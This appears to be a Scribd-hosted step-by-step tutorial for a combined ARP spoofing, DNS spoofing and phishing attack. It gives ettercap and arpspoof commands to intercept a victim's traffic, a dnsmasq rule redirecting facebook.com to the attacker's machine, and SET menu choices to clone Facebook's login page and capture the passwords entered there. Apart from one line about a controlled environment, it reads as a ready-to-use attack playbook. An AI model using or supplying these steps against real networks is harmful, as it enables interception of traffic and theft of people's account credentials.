Scribd
Upload
17 views5 pages

Securitee Attack

Uploaded by

tahya.lehbib
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
17 views5 pages

Securitee Attack

Uploaded by

tahya.lehbib
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

DNS Spoofing Attack with Credential Harvesting

Concept:

This attack combines DNS spoofing (or DNS poisoning) with credential harvesting via
phishing. It manipulates how domain names are resolved in a network and directs
users to a malicious site that appears legitimate. When the victim interacts with this
cloned site, their credentials (like usernames and passwords) are captured by the
attacker.

Key Components of the Attack:

1. DNS Spoofing:
○ DNS (Domain Name System) translates domain names (like
facebook.com) into IP addresses (like 192.168.0.1).
○ In DNS spoofing, the attacker intercepts this process by poisoning the
DNS resolution table of the victim or router. This means that when the
victim types a domain name, they are redirected to the attacker’s IP
address instead of the legitimate website.
○ The attacker controls where the user’s traffic goes, leading them to a
fake (phishing) site.
2. ARP Spoofing (Man-in-the-Middle):
○ ARP (Address Resolution Protocol) Spoofing allows the attacker to
position themselves between the victim and the router. By doing so, the
attacker can monitor or manipulate traffic, allowing them to reroute DNS
requests.
○ This is essential to perform DNS spoofing as it gives the attacker
control over network traffic between the victim and the router.
3. Phishing and Credential Harvesting:
○ Phishing is a social engineering attack where a cloned version of a
legitimate site (e.g., facebook.com) is used to trick the victim into
entering sensitive information, such as login credentials.
○ Using tools like the Social Engineering Toolkit (SET), the attacker
clones the login page of a popular website and hosts it on their own
server.
○ When the victim is redirected to this fake site (due to DNS spoofing) and
enters their credentials, the information is sent to the attacker instead of
the legitimate site.

STEPS

Step 1: ARP Spoofing with ettercap (Man-in-the-Middle Setup)

Objective: Intercept the traffic between the victim's device and the router.
Steps:

1. Open Terminal and Start ettercap:

Launch ettercap in text mode:


bash
Copier le code
sudo ettercap -T -q -M arp:remote /[victim_IP]/ /[router_IP]/


○ Replace [victim_IP] with the IP address of the victim and
[router_IP] with the IP of the router.
○ This command will start ARP poisoning, tricking both the router and the
victim into thinking your machine is the legitimate connection point,
intercepting their traffic.
2. Verify ARP Spoofing:

You can use the arpspoof command to ensure you are intercepting the traffic:
bash
Copier le code
sudo arpspoof -i wlan0 -t [victim_IP] [router_IP]

Step 2: DNS Spoofing with dnsmasq

Objective: Redirect the victim's DNS requests for specific domains (like
facebook.com) to your malicious server, where a phishing page is hosted.

Steps:

1. Install dnsmasq (if not installed):

Use the following command to install it:


bash
Copier le code
sudo apt-get install dnsmasq


2. Configure dnsmasq to Spoof DNS Requests:

Open the dnsmasq.conf file to set up DNS spoofing:


bash
Copier le code
sudo nano /etc/dnsmasq.conf


Add the following lines to redirect traffic from a legitimate domain (e.g.,
facebook.com) to your malicious server's IP (e.g., your Kali machine’s IP):
css
Copier le code
address=/facebook.com/[your_Kali_IP]


○ Save and exit the file.
3. Start dnsmasq Service:

Start the DNS service with:


bash
Copier le code
sudo service dnsmasq start


4. Verify DNS Spoofing:
○ Test if the victim’s DNS requests are being redirected to your server.
You can use a different machine or virtual machine to check if visiting
facebook.com leads to your Kali IP.

Step 3: Set Up a Phishing Page with SET (Social Engineering Toolkit)

Objective: Create a fake login page (e.g., Facebook or Gmail) to capture the victim’s
credentials once they are redirected by DNS spoofing.

Steps:

1. Launch SET:

Run the following command to launch the Social Engineering Toolkit:


bash
Copier le code
sudo setoolkit


2. Select Website Attack Vectors:

Once SET is launched, select the option for Website Attack Vectors:
mathematica
Copier le code
1) Social-Engineering Attacks

2) Website Attack Vectors


3. Choose Credential Harvester Attack Method:
Choose the Credential Harvester Attack Method to clone the website and capture
login details:
mathematica
Copier le code
3) Credential Harvester Attack Method


4. Clone a Website (Facebook Example):

Select the option to Clone a Website and provide the URL of the site you want to
clone (e.g., facebook.com):
mathematica
Copier le code
2) Site Cloner

Enter the URL: https://www.facebook.com


5. Set Your Kali IP for Harvesting:

Enter the IP address of your Kali machine (which the victim will be redirected to via
DNS spoofing). This is where the phishing page will be hosted:
css
Copier le code
Enter the IP address to redirect the victim: [your_Kali_IP]


6. Start Credential Harvester:
○ SET will clone the website and create a phishing page that looks
identical to the real Facebook login page. It will also start capturing
credentials entered into the fake login page.

Step 4: Capture Credentials

Objective: Monitor the victim’s interaction with your phishing page and capture their
login credentials.

Steps:

1. Monitor the Phishing Page:


○ As soon as the victim visits facebook.com, they will be redirected to
your cloned phishing page. When they try to log in, their credentials will
be captured.
2. View Captured Credentials:
○ SET will automatically log any credentials entered on the phishing page
and display them in the terminal. You can find them in the harvester
logs generated by SET.
For example:
yaml
Copier le code
[!] Credentials captured:

Username: [email protected]

Password: victim_password123


3. Optional: Use Wireshark to Analyze Network Traffic:
○ Open Wireshark and monitor the network traffic to further analyze the
packets and confirm that DNS requests are being spoofed, and
credentials are being transmitted over the network.

Step 5: Clean Up

Once you've completed the attack in a controlled environment, be sure to stop the
ARP spoofing and DNS services to restore normal network operations.

Stop ARP spoofing:


bash
Copier le code
sudo ettercap -C

Stop DNS spoofing:


bash
Copier le code
sudo service dnsmasq stop

Summary of Tools Used:

1. Ettercap: For ARP spoofing to establish the Man-in-the-Middle.


2. dnsmasq: For DNS spoofing, redirecting the victim to your phishing page.
3. SET (Social Engineering Toolkit): To clone the target website and capture
credentials.

You might also like